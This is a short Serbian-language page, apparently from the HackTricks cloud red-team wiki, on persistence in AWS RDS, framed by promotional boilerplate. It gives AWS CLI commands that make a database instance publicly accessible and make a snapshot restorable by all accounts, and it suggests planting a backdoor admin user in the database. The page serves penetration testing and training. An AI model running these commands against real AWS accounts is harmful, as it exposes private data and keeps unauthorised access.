AWS - RDS Perzistencija

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

RDS

Za više informacija pogledajte:

AWS - Relational Database (RDS) Enum

Omogućavanje javnog pristupa instanci: rds:ModifyDBInstance

Napadač sa ovom dozvolom može izmeniti postojeću RDS instancu kako bi omogućio javni pristup.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Kreirajte admin korisnika unutar DB

Napadač može jednostavno kreirati korisnika unutar DB, tako da, čak i ako je lozinka master naloga promenjena, on ne izgubi pristup bazi podataka.

Učinite snapshot javnim

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.